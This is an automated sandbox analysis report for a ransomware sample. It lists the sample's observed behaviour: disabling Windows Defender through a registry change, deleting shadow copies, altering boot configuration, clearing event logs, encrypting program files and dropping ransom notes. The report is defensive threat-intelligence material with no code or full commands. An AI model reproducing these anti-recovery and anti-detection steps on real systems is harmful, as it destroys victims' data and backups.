Analysis Overview
SHA256
a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357
Threat Level: Known bad
The file a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Modifies security service
Hive
Modifies boot configuration data using bcdedit
Deletes shadow copies
Clears Windows event logs
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Opens file in notepad (likely ransom note)
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 14:10
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 14:10
Reported
2022-01-12 14:12
Platform
win7-en-20211208
Max time kernel
104s
Max time network
12s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\builtincontrolsschema.xsd.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL058.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LABEL98.POC.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\1 Top.accdt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_floating.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\mobile.html.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285780.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR16F.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGZIP.DPV.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\clock.html | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AFTRNOON\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\NL.ROGERS.COM.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0295069.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00525_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSGR3FR.LEX.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LETTHEAD.XML.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115866.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21548_.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR20F.GIF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_left.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\css\settings.css | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\videowall.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105846.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00578_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1036\MSO.ACL.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152432.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hardware Tracker.fdt.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\icon.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_right.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Metlakatla.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00538_.WMF.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png.QFwrCMYnG0WR-y3J9lzNOcZyx3-M57ledsFETGvg0Ir_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
